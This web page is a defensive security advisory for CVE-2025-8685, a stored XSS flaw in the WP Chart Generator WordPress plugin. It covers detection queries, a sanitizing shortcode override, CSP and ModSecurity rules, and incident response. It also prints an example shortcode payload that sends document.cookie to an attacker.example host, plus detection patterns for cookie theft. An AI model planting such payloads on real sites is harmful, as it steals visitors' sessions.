| Plugin Name | Wp chart generator |
|---|---|
| Type of Vulnerability | Authenticated Stored XSS |
| CVE Number | CVE-2025-8685 |
| Urgency | Low |
| CVE Publish Date | 2025-08-11 |
| Source URL | CVE-2025-8685 |
Vulnerability Advisory: WP Chart Generator (≤ 1.0.4) — Authenticated Contributor Stored XSS via [wpchart] Shortcode (CVE‑2025‑8685)
Executive summary
This advisory describes a stored cross-site scripting (XSS) vulnerability in the “WP Chart Generator” WordPress plugin (versions ≤ 1.0.4), tracked as CVE‑2025‑8685. An authenticated user with Contributor privileges (or higher) can store malicious payloads via the plugin’s [wpchart] shortcode. Because the payload is persistent, visitors who view the affected page may execute attacker-controlled JavaScript in their browsers.
Severity is considered low-to-medium in the reported disclosure (CVSS vector ~6.5) because exploitation requires an authenticated Contributor account. There is no official vendor patch at the time of publication. This advisory provides technical detail, detection methods, short-term mitigation options, developer remediation guidance, WAF/ModSecurity rule examples, and an incident response checklist from the perspective of an experienced Hong Kong security practitioner.
What is the vulnerability?
- Affected software: WP Chart Generator plugin
- Affected versions: ≤ 1.0.4
- Vulnerability type: Stored Cross-Site Scripting (XSS) in the rendering of the [wpchart] shortcode
- Required privilege: Contributor (or higher)
- Published: 11 August 2025
- CVE: CVE‑2025‑8685
- Official fix: None at time of publication
The plugin renders untrusted shortcode attributes and/or inner content directly into front-end HTML/JS without correct sanitization and escaping. A contributor can create content with a crafted [wpchart] shortcode containing script fragments or event handlers. When rendered, the browser executes the injected JavaScript in the origin of the site.
Why it matters (impact analysis)
Stored XSS remains high-risk even when initial access requires low privilege. Key impacts:
- Persistent payloads execute each time visitors view the page, broadening exposure.
- Executed JavaScript runs with the page origin privileges: it can attempt to steal cookies (if not HttpOnly), perform actions on behalf of logged-in users, display phishing UI or redirect visitors, and load further malicious resources (exploit chains, loaders, cryptominers).
- Many sites allow contributor accounts (e.g., multi-author blogs, membership sites), so an attacker can gain or create such accounts.
- Editor/admin accounts viewing front-end content while logged-in increase the risk of privilege escalation or account takeover.
How the exploit looks — high-level technical walkthrough
The plugin registers a [wpchart] shortcode that accepts attributes (labels, titles, data arrays, colors). The vulnerability arises when these attributes are embedded into HTML or inline JavaScript without context-aware escaping.
- An attacker obtains or creates a Contributor account.
- They add a post or page containing a crafted
[wpchart]shortcode with attributes or inner content bearing script fragments or event handlers. - The payload is stored in the database. When the page is served, the browser parses the injected markup or script and executes it.
- Any visitor (including logged-in editors/admins) can trigger the payload.
Illustrative payloads (do not deploy on public sites):
[wpchart title=""]</code></pre>
<pre><code>[wpchart data='[{"label":"<img src=x onerror=fetch(\"https://attacker.example/steal?c=\"+document.cookie)>","value":10}]']</code></pre>
<p>The root cause is rendering untrusted input into HTML/JS contexts without escaping or validation.</p>
</section>
<section>
<h2 id="exploitation-scenarios-and-who-is-at-risk">Exploitation scenarios and who is at risk</h2>
<ul>
<li>Sites allowing contributors to create content (membership or multi-author sites).</li>
<li>Sites with social registration, bulk-imported authors, or weak account controls.</li>
<li>Sites where editors/admins preview or view front-end content while authenticated.</li>
<li>Public visitors and customers can be affected (privacy and reputational harm).</li>
<li>Commerce sites are particularly sensitive due to potential tampering of checkout flows.</li>
</ul>
</section>
<section>
<h2 id="detection-how-to-find-vulnerable-or-exploited-instances">Detection — how to find vulnerable or exploited instances</h2>
<p>Search posts, pages, and meta for <code>[wpchart]</code> instances and script-like fragments.</p>
<h3 id="wp-cli">WP-CLI</h3>
<pre><code># Search posts and pages for 'wpchart'
wp post list --post_type='post,page' --format=ids | xargs -n1 -I% wp post get % --field=post_content | grep -n '\[wpchart'
</code></pre>
<h3 id="sql">SQL</h3>
<pre><code>-- Search post_content for the wpchart shortcode
SELECT ID, post_title
FROM wp_posts
WHERE post_content LIKE '%[wpchart%';
</code></pre>
<p>Look for suspicious tokens: <code><script</code>, <code>onerror=</code>, <code>onload=</code>, <code>javascript:</code>, <code>document.cookie</code>, <code>fetch(</code>, and encoded equivalents (e.g., <code><script></code>, <code>%3Cscript%3E</code>).</p>
<pre><code>SELECT ID, post_title, post_content
FROM wp_posts
WHERE post_content REGEXP '(?i)(<script|onerror=|javascript:|document.cookie|fetch\\()';
</code></pre>
<p>Also search postmeta and plugin options where chart configurations may be stored:</p>
<pre><code>SELECT post_id, meta_key, meta_value
FROM wp_postmeta
WHERE meta_value LIKE '%wpchart%'
OR meta_value REGEXP '(?i)(<script|onerror=|javascript:|document.cookie|fetch\\()';
</code></pre>
<p>Examine webserver logs for POSTs creating/updating content and for outbound requests to suspicious domains originating from page views.</p>
</section>
<section>
<h2 id="short-term-mitigations-site-owners-and-admins">Short-term mitigations (site owners and admins)</h2>
<p>If an immediate vendor patch is unavailable, take the following actions to reduce exposure:</p>
<ol>
<li><strong>Remove or deactivate the plugin (preferred):</strong> If chart functionality is not required immediately, deactivate and remove the plugin until fixed.</li>
<li><strong>Restrict Contributor accounts:</strong> Temporarily disable new registrations or change default role to Subscriber. Review contributors and suspend or reset passwords for suspicious accounts.</li>
<li><strong>Review content and remove malicious shortcodes:</strong> Search posts/pages and sanitize or remove any <code>[wpchart]</code> occurrences that include script-like patterns.</li>
<li><strong>Temporary server-side sanitizer (virtual patch):</strong> Override the shortcode with a safe handler to sanitize attributes and content. Example mu-plugin snippet:</li>
</ol>
<pre><code><?php
// mu-plugin/wpchart-sanitizer.php
if ( ! function_exists( 'wpchart_sanitized_handler' ) ) {
function wpchart_sanitized_handler( $atts = [], $content = '' ) {
// Basic attribute sanitization example
$atts = array_map( 'sanitize_text_field', (array) $atts );
// whitelist numeric attributes
if ( isset( $atts['width'] ) ) {
$atts['width'] = intval( $atts['width'] );
}
if ( isset( $atts['height'] ) ) {
$atts['height'] = intval( $atts['height'] );
}
// sanitize content using a safe allowlist
$content = wp_kses( $content, array(
'a' => array( 'href' => true, 'title' => true ),
'span' => array( 'class' => true ),
) );
// Build safe output (example: escaped)
$title = isset( $atts['title'] ) ? esc_html( $atts['title'] ) : '';
return '<div class="wpchart-safe" data-config="' . esc_attr( json_encode( $atts ) ) . '">' . $title . $content . '</div>';
}
// Remove original shortcode if registered and register safe handler
remove_shortcode( 'wpchart' );
add_shortcode( 'wpchart', 'wpchart_sanitized_handler' );
}
?>
</code></pre>
<p>Notes: place this as an mu-plugin so it loads early. This is a temporary mitigation to neutralize stored payloads before rendering.</p>
<ol start="5">
<li><strong>Harden browser-side controls:</strong> Implement a Content Security Policy (CSP) that blocks inline scripts and restricts script sources. Example header:
<pre><code>Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.example.com; object-src 'none'; base-uri 'self'; frame-ancestors 'none'</code></pre>
<p> Also ensure cookies use Secure and HttpOnly flags and consider SameSite settings.</li>
<li><strong>Deploy rule-based request filters:</strong> Use host-level or application-layer filters to block content submissions containing script-like payloads targeted at the <code>[wpchart]</code> shortcode (examples below).</li>
</ol>
</section>
<section>
<h2 id="waf-modsecurity-rules-examples">WAF / ModSecurity rules (examples)</h2>
<p>Below are example ModSecurity rules to block common XSS patterns related to <code>[wpchart]</code>. Test thoroughly before applying to production.</p>
<pre><code># ModSecurity example
SecRule REQUEST_URI|REQUEST_BODY "@rx \[wpchart[^\]]*(<script|onerror=|onload=|javascript:|document\.cookie|fetch\()" \
"id:1001001,phase:2,deny,log,status:403,msg:'Blocked stored XSS attempt in wpchart shortcode',severity:2"
</code></pre>
<pre><code>SecRule REQUEST_METHOD "^POST$" \
"chain, id:1001002,phase:2,deny,log,status:403,msg:'Blocked POST containing script tag',severity:2"
SecRule REQUEST_BODY "@rx <\s*script\b" "t:none"
</code></pre>
<pre><code>SecRule REQUEST_BODY "@rx \[wpchart[^\]]*(onerror|onload|javascript:|document\.cookie|window\.location)" \
"id:1001003,phase:2,deny,log,status:403,msg:'Blocked suspicious attribute inside wpchart',severity:2"
</code></pre>
<pre><code>SecRule REQUEST_URI "@rx /wp-admin/post.php|/wp-admin/post-new.php" \
"phase:2,id:1001004,deny,log,status:403,msg:'Blocked potential XSS payload in post content',chain"
SecRule REQUEST_BODY "@rx (onerror|onload|<\s*script|javascript:|document\.cookie|fetch\()" "t:none"
</code></pre>
<p>Guidance:</p>
<ul>
<li>Target rules narrowly (match the <code>[wpchart]</code> token and plugin-specific meta keys) to reduce false positives.</li>
<li>Log and run in monitor/report-only mode initially to tune rules, then switch to deny once confidence is established.</li>
<li>Combine with rate-limiting to mitigate repeated attempts.</li>
</ul>
</section>
<section>
<h2 id="recommended-permanent-code-fixes-for-plugin-developers">Recommended permanent code fixes for plugin developers</h2>
<p>Developers should address the root causes with robust validation and context-aware escaping:</p>
<ol>
<li><strong>Sanitize input on accept:</strong> Use typed validation for numeric fields (intval(), floatval()), use <code>sanitize_text_field()</code> for simple strings, and parse & validate JSON configuration server-side.</li>
<li><strong>Escape output per context:</strong> Use <code>esc_attr()</code> for attribute values, <code>esc_html()</code> for text nodes and <code>wp_kses()</code> with strict allowlists for any permitted HTML. Avoid echoing unchecked input into inline scripts.</li>
<li><strong>Prefer data-* attributes:</strong> Emit sanitized JSON inside a data attribute via <code>wp_json_encode()</code> and let a vetted client-side script consume that data safely.</li>
<li><strong>Enforce capability checks and nonces:</strong> For any AJAX endpoints or admin UI that stores content, enforce <code>current_user_can()</code> and <code>check_admin_referer()</code>.</li>
<li><strong>Example safe shortcode output pattern:</strong></li>
</ol>
<pre><code>function wpchart_safe_shortcode( $atts = [], $content = '' ) {
$atts = shortcode_atts( array(
'title' => '',
'width' => 600,
'height' => 400,
'data' => '[]',
), $atts, 'wpchart' );
// Sanitize / validate
$safe = array(
'title' => sanitize_text_field( $atts['title'] ),
'width' => intval( $atts['width'] ),
'height' => intval( $atts['height'] ),
);
// For JSON data: decode and validate structure; re-encode safely
$data = json_decode( wp_unslash( $atts['data'] ), true );
if ( ! is_array( $data ) ) {
$data = array();
}
// Validate each data point (example)
$validated_data = array();
foreach ( $data as $row ) {
$label = isset( $row['label'] ) ? sanitize_text_field( $row['label'] ) : '';
$value = isset( $row['value'] ) ? floatval( $row['value'] ) : 0;
$validated_data[] = array( 'label' => $label, 'value' => $value );
}
// Output: store config safely in data attribute and escape it for HTML
$cfg = wp_json_encode( array(
'title' => $safe['title'],
'width' => $safe['width'],
'height'=> $safe['height'],
'data' => $validated_data,
) );
return sprintf(
'<div class="wpchart" data-wpchart="%s"></div>',
esc_attr( $cfg )
);
}
</code></pre>
<p>Do not build inline scripts that interpolate user-provided values. Use external, audited JS that reads sanitized <code>data-*</code> attributes.</p>
</section>
<section>
<h2 id="incident-response-if-you-suspect-exploitation">Incident response: If you suspect exploitation</h2>
<ol>
<li>Take affected page(s) offline (unpublish) or put the site into maintenance mode if widespread.</li>
<li>Identify and remove malicious posts, shortcodes or plugin meta entries (see detection section).</li>
<li>Change passwords for Contributor+ accounts and administrators. Consider forcing password resets for all users if compromise is suspected.</li>
<li>Inspect server logs for suspicious activity and block attacker IPs at host or WAF level.</li>
<li>Run a full malware scan and file integrity check. Look for added admin users, unexpected scheduled tasks, or backdoors.</li>
<li>Rotate API keys, integration tokens, and any stored credentials that could be exposed.</li>
<li>If admin accounts were compromised, audit site settings and restore from a known-clean backup if necessary.</li>
<li>Notify affected users if user data may have been exposed, following applicable privacy and breach-notification law.</li>
<li>After cleanup, re-enable stricter registration policies, enforce two-factor authentication for elevated roles, apply CSP and secure HTTP headers.</li>
<li>Monitor for re-injection attempts and maintain long-term detection rules.</li>
</ol>
</section>
<section>
<h2 id="monitoring-and-detection-after-cleanup">Monitoring and detection after cleanup</h2>
<ul>
<li>Enable logging for request filters and review blocked events.</li>
<li>Set up content integrity checks to detect reappearance of suspicious <code>[wpchart]</code> shortcodes or injected script tags.</li>
<li>Schedule weekly scans and manual reviews for a period after the incident.</li>
<li>Deploy updates in a staging environment and validate fixes before production rollout.</li>
</ul>
</section>
<section>
<h2 id="hardening-recommendations-to-reduce-xss-risk-site-wide">Hardening recommendations to reduce XSS risk site-wide</h2>
<ul>
<li>Apply principle of least privilege: limit Contributor role usage and consider custom roles with reduced capabilities.</li>
<li>Require editorial review workflows: contributors should submit for review rather than publish directly.</li>
<li>Enforce strong passwords and two-factor authentication for editors and administrators.</li>
<li>Restrict untrusted user registration or require administrator approval.</li>
<li>Use CSP in report-only mode first to identify issues, then enforce once safe.</li>
<li>Ensure session cookies are HttpOnly and Secure; consider SameSite settings.</li>
<li>Keep WordPress core and plugins updated and perform periodic security audits.</li>
</ul>
</section>
<section>
<h2 id="a-short-note-for-developers-test-for-xss-during-qa">A short note for developers: test for XSS during QA</h2>
<ul>
<li>Include input fuzzing for shortcode attributes and stored values.</li>
<li>Automate tests to detect unescaped outputs in HTML and JS contexts.</li>
<li>Review third-party chart libraries and ensure data is passed safely (prefer data-* + JSON + validated client-side rendering).</li>
<li>Maintain a clear disclosure policy and a public changelog to accelerate coordinated fixes when issues are reported.</li>
</ul>
</section>
<section>
<h2 id="frequently-asked-questions-faq">Frequently asked questions (FAQ)</h2>
<h3 id="q-if-i-am-not-using-the-wp-chart-generator-plugin-am-i-affected">Q: If I am not using the WP Chart Generator plugin, am I affected?</h3>
<p>No. This advisory concerns specifically the WP Chart Generator plugin (≤ 1.0.4). However, the general guidance applies to any plugin that renders unescaped user input.</p>
<h3 id="q-if-an-attacker-needs-a-contributor-account-is-my-site-safe">Q: If an attacker needs a Contributor account, is my site safe?</h3>
<p>Not necessarily. Many sites allow registrations that map to low-privilege roles; weak or reused passwords are a common vector. Treat user registration as a potential risk and limit privileges where possible.</p>
<h3 id="q-will-a-content-security-policy-fully-prevent-exploitation">Q: Will a Content Security Policy fully prevent exploitation?</h3>
<p>A properly configured CSP substantially reduces the impact of many XSS payloads by blocking inline scripts and restricting script origins, but CSP should complement input sanitization and server-side protections — it is not a substitute for correct coding.</p>
<h3 id="q-is-the-issue-already-patched">Q: Is the issue already patched?</h3>
<p>At the time of this advisory, no official patched release was available. Follow the plugin's release channel for updates and apply the mitigations listed here until a patch is published.</p>
</section>
<section>
<h2 id="closing-thoughts">Closing thoughts</h2>
<p>Stored XSS like CVE‑2025‑8685 can have persistent and far-reaching consequences. Although exploitation requires authenticated access, many realistic paths exist to obtain contributor-level permissions. Treat unescaped shortcode attributes and plugin-rendered client-side scripts as high priority. Immediate actions: review and sanitize content, restrict Contributor capabilities, apply temporary sanitization or request-filtering, and consider deactivating the plugin until it is fixed. Plugin authors should implement strict input validation and context-aware escaping for all shortcode attributes and stored content.</p>
<p>If you lack in-house capability to perform scans or apply mitigations, engage a trusted security practitioner or managed service to assist with detection, virtual patching and recovery steps. Maintain careful logs of remediation actions and preserve forensic artifacts if a compromise is suspected.</p>
<p style="margin-top:12px;">Stay vigilant. Review user-generated content regularly and reduce the blast radius of low-privilege user accounts.</p>
</section>
<footer style="margin-top:28px;color:#666;font-size:0.95em;">
<p>Prepared by a Hong Kong security expert. CVE record: <a href="https://www.cve.org/CVERecord/SearchResults?query=CVE-2025-8685" target="_blank" rel="noopener noreferrer">CVE-2025-8685</a>.</p>
</footer>
<p></body><br />
</html></p>
</div>
<section class="post-tags"><ul><li><h5 class="title-tags">Tags:</h5></li><li><a href="https://wp-security.org/tag/wordpress-security/" rel="tag">WordPress Security</a></li></ul></section> <div class="pk-share-buttons-wrap pk-share-buttons-layout-default pk-share-buttons-scheme-bold-bg pk-share-buttons-has-counts pk-share-buttons-has-total-counts pk-share-buttons-after-post pk-share-buttons-mode-php pk-share-buttons-mode-rest" data-post-id="803" data-share-url="https://wp-security.org/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" >
<div class="pk-share-buttons-total pk-share-buttons-total-no-count">
<div class="pk-share-buttons-count cs-font-primary">0 Shares:</div>
</div>
<div class="pk-share-buttons-items">
<div class="pk-share-buttons-item pk-share-buttons-facebook pk-share-buttons-no-count" data-id="facebook">
<a href="https://www.facebook.com/sharer.php?u=https://wp-security.org/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-facebook"></i>
<span class="pk-share-buttons-label pk-font-primary">Share</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
<div class="pk-share-buttons-item pk-share-buttons-twitter pk-share-buttons-no-count" data-id="twitter">
<a href="https://twitter.com/share?&text=Hong%20Kong%20Security%20NGO%20warns%20WordPress%20XSS%28CVE20258685%29&url=https://wp-security.org/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-twitter"></i>
<span class="pk-share-buttons-label pk-font-primary">Tweet</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
<div class="pk-share-buttons-item pk-share-buttons-pinterest pk-share-buttons-no-count" data-id="pinterest">
<a href="https://pinterest.com/pin/create/bookmarklet/?url=https://wp-security.org/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/&media=https://wp-security.org/wp-content/uploads/2025/08/2025-08-11CVE20258685Wp-chart-generator-1024x576.jpg" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-pinterest"></i>
<span class="pk-share-buttons-label pk-font-primary">Pin it</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
</div>
</div>
<section class="post-author">
<div class="authors-compact">
<div class="author-wrap">
<div class="author">
<div class="author-avatar">
<a href="https://wp-security.org/author/wp-security/" rel="author">
<img alt='' src='https://secure.gravatar.com/avatar/16bf83a02c7c3aa39247769e866366c2ea8ccfb8bd88a16ef3ac35925a1da888?s=120&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/16bf83a02c7c3aa39247769e866366c2ea8ccfb8bd88a16ef3ac35925a1da888?s=240&d=mm&r=g 2x' class='avatar avatar-120 photo' height='120' width='120' decoding='async'/> </a>
</div>
<div class="author-description">
<h5 class="title-author">
<span class="fn">
<a href="https://wp-security.org/author/wp-security/" rel="author">
WP Security Vulnerability Report </a>
</span>
</h5>
<p class="note"></p>
</div>
</div>
</div>
</div>
</section>
<div id="disqus_thread"></div>
</div>
</div>
</article>
<div class="post-prev-next">
<a class="link-item prev-link" href="https://wp-security.org/vulnerability-database/gmap-venturit-stored-xss-alert-for-hkcve20258568/">
<div class="link-content">
<div class="link-label">
<span class="link-arrow"></span><span class="link-text"> — Previous article</span>
</div>
<h2 class="entry-title">
GMap Venturit Stored XSS Alert for HK(CVE20258568) </h2>
</div>
</a>
<a class="link-item next-link" href="https://wp-security.org/vulnerability-database/hong-kong-security-avatar-migration-authorization-flawcve20258482/">
<div class="link-content">
<div class="link-label">
<span class="link-text">Next article — </span><span class="link-arrow"></span>
</div>
<h2 class="entry-title">
Hong Kong Security Avatar Migration Authorization Flaw(CVE20258482) </h2>
</div>
</a>
</div>
<section class="post-archive archive-related">
<div class="archive-wrap">
<div class="title-block-wrap">
<h5 class="title-block">
You May Also Like </h5>
</div>
<div class="archive-main archive-list archive-heading-small archive-borders-enabled archive-shadow-enabled archive-scale-enabled">
<article class="entry-without-preview post-808 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/vulnerability-database/hong-kong-security-advisory-wordpress-elementor-xsscve20258874/" rel="bookmark">Hong Kong Security Advisory WordPress Elementor XSS(CVE20258874)</a></h2><ul class="post-meta"><li class="meta-date">August 11, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress Master Addons for Elementor plugin <= 2.0.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via fancyBox vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-777 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/vulnerability-database/hong-kong-security-ngo-warns-fundengine-lficve202548302/" rel="bookmark">Hong Kong Security NGO Warns FundEngine LFI(CVE202548302)</a></h2><ul class="post-meta"><li class="meta-date">August 10, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress FundEngine Plugin <= 1.7.4 - Local File Inclusion Vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-764 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/vulnerability-database/lead-capturing-pages-arbitrary-content-deletion-vulnerabilitycve202531425/" rel="bookmark">Lead Capturing Pages Arbitrary Content Deletion Vulnerability(CVE202531425)</a></h2><ul class="post-meta"><li class="meta-date">August 8, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress WP Lead Capturing Pages plugin <= 2.3 - Arbitrary Content Deletion vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-782 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/vulnerability-database/hong-kong-wordpress-the7-stored-xss-alertcve20257726/" rel="bookmark">Hong Kong WordPress The7 Stored XSS Alert(CVE20257726)</a></h2><ul class="post-meta"><li class="meta-date">August 11, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress The7 plugin <= 12.6.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via title and data-dt-img-description Attributes vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-471 post type-post status-publish format-standard category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/vulnerability-database/critical-vulnerability-in-woocommerce-multiple-file-uploadcve20254403/" rel="bookmark">Critical Vulnerability in WooCommerce Multiple File Upload(CVE20254403)</a></h2><ul class="post-meta"><li class="meta-date">August 6, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress Drag and Drop Multiple File Upload for WooCommerce plugin <= 1.1.6 - Unauthenticated Arbitrary File Upload via upload Function vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-805 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/vulnerability-database/hong-kong-security-avatar-migration-authorization-flawcve20258482/" rel="bookmark">Hong Kong Security Avatar Migration Authorization Flaw(CVE20258482)</a></h2><ul class="post-meta"><li class="meta-date">August 11, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress Simple Local Avatars plugin <= 2.8.4 - Missing Authorization to Authenticated (Subscriber+) Avatar Migration vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
</div>
</div>
</section>
</main>
</div><!-- .content-area -->
</div><!-- .main-content -->
</div><!-- .cs-container -->
</div><!-- .site-content -->
<footer id="colophon" class="site-footer">
<div class="footer-subscribe">
<div class="cs-container">
<div class="subscribe-wrap">
</div>
</div>
</div>
<div class="footer-info">
<div class="cs-container">
<div class="site-info">
<div class="footer-col-info">
<span class="site-title footer-title" href="https://wp-security.org/" rel="home">
<img src="https://wp-security.org/wp-content/uploads/2025/08/WP-Security-logo-1-e1754494371106.png" alt="WP Security" > </span>
<div class="footer-copyright">
© 2025 WP-Security.org Disclaimer: WP-Security.org is an independent, non-profit NGO community committed to sharing WordPress security news and information. We are not affiliated with WordPress, its parent company, or any related entities. All trademarks are the property of their respective owners. </div>
</div>
</div>
</div>
</div>
</footer>
</div>
</div><!-- .site-inner -->
</div><!-- .site -->
<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/wp-content\/uploads\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/squaretype\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<a href="#top" class="pk-scroll-to-top">
<i class="pk-icon pk-icon-up"></i>
</a>
<div class="pk-mobile-share-overlay">
</div>
<script type="text/javascript">
var _paq = _paq || [];
_paq.push(['setCustomDimension', 1, '{"ID":3,"name":"WP Security Vulnerability Report","avatar":"f7de7e299d4a4b4c92c6f2c2a29a7ca7"}']);
_paq.push(['trackPageView']);
(function () {
var u = "https://analytics2.wpmudev.com/";
_paq.push(['setTrackerUrl', u + 'track/']);
_paq.push(['setSiteId', '24942']);
var d = document, g = d.createElement('script'), s = d.getElementsByTagName('script')[0];
g.type = 'text/javascript';
g.async = true;
g.defer = true;
g.src = 'https://analytics.wpmucdn.com/matomo.js';
s.parentNode.insertBefore(g, s);
})();
</script>
<script type="importmap" id="wp-importmap">
{"imports":{"@surecart\/checkout":"https:\/\/wp-security.org\/wp-content\/plugins\/surecart\/packages\/blocks-next\/build\/scripts\/checkout\/index.js?ver=b851c1733a0c206ca80b","@surecart\/checkout-events":"https:\/\/wp-security.org\/wp-content\/plugins\/surecart\/packages\/blocks-next\/build\/scripts\/checkout-events\/index.js?ver=ed9647bd6c7865efe2ad","@wordpress\/interactivity":"https:\/\/wp-security.org\/wp-includes\/js\/dist\/script-modules\/interactivity\/index.min.js?ver=55aebb6e0a16726baffb","@surecart\/checkout-service":"https:\/\/wp-security.org\/wp-content\/plugins\/surecart\/packages\/blocks-next\/build\/scripts\/checkout-actions\/index.js?ver=644067ed5ed79d43f6b1","@surecart\/google-events":"https:\/\/wp-security.org\/wp-content\/plugins\/surecart\/packages\/blocks-next\/build\/scripts\/google\/index.js?ver=d92e383a18bcf54ea538","@surecart\/facebook-events":"https:\/\/wp-security.org\/wp-content\/plugins\/surecart\/packages\/blocks-next\/build\/scripts\/facebook\/index.js?ver=cf5c6499cb7b867894c1","@surecart\/a11y":"https:\/\/wp-security.org\/wp-content\/plugins\/surecart\/packages\/blocks-next\/build\/scripts\/a11y\/index.js?ver=fbe783039308da940df7","@surecart\/api-fetch":"https:\/\/wp-security.org\/wp-content\/plugins\/surecart\/packages\/blocks-next\/build\/scripts\/fetch\/index.js?ver=1bfba8ea0694a193022a"}}
</script>
<script type="module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/cart/index.js?ver=4b29ce0031f7a842a5ab" id="@surecart/cart-js-module"></script>
<script type="module" src="https://wp-security.org/wp-content/plugins/surecart/packages/blocks-next/build/scripts/checkout/index.js?ver=b851c1733a0c206ca80b" id="@surecart/checkout-js-module"></script>
<script type="application/json" id="wp-script-module-data-@wordpress/interactivity">
{"state":{"surecart/checkout":{"checkout":{"line_items":{"data":[]}},"discountIsRedeemable":false,"isDiscountApplied":false,"itemsCount":0,"hasItems":false}}}
</script>
<div id="fb-root"></div>
<script async defer crossorigin="anonymous" src="https://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v17.0&appId=&autoLogAppEvents=1" nonce="Ci8te34e"></script>
<script>
var _SEARCHWP_LIVE_AJAX_SEARCH_BLOCKS = true;
var _SEARCHWP_LIVE_AJAX_SEARCH_ENGINE = 'default';
var _SEARCHWP_LIVE_AJAX_SEARCH_CONFIG = 'default';
</script>
<script>
window.scFetchData =
{"root_url":"https:\/\/wp-security.org\/wp-json\/","nonce":"a868770e15","nonce_endpoint":"https:\/\/wp-security.org\/wp-admin\/admin-ajax.php?action=sc-rest-nonce"} </script>
